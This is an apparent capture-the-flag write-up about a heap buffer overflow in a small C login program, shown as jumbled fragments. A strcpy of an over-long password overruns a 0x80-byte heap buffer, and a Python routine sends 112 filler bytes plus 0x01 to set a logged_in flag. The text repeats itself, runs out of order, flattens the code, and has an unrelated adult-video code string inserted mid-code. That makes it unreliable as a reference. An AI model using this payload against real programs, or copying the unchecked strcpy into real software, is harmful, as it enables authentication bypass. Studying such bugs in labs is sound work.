heap: 0x603010 -> name buffer (0x80) 0x603090 -> pwd buffer (0x80)
struct user char *name; // 8 bytes char *pwd; // 8 bytes ;
void register_user(void) !pwd) puts("OOM"); exit(1); tokyohot n0541
strcpy(user->pwd, buf); Thus, an overflow of buf can overflow that user->pwd points to! By providing an over‑long password we can write past the allocated 0x80 bytes of pwd and reach the logged_in variable located at 0x603200 (example address).
int main(void) setbuf(stdout, NULL); while (1) menu(); int choice; if (scanf("%d%*c", &choice) != 1) break; switch (choice) case 1: register_user(); break; case 2: login(); break; case 3: show_secret(); break; case 4: exit(0); default: puts("Invalid"); break; return 0; heap: 0x603010 -> name buffer (0x80) 0x603090 ->
def login_overwrite(s): menu(s) s.sendall(b'2\n') recvuntil(s, b'Password: ') # 112 filler + 0x01 + newline payload = b'A' * 112 + b'\x01' + b'\n' s.sendall(payload)
there is a hidden detail: the program copies the password from the stack buffer into the heap password field using strcpy : heap: 0x603010 ->
#define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h>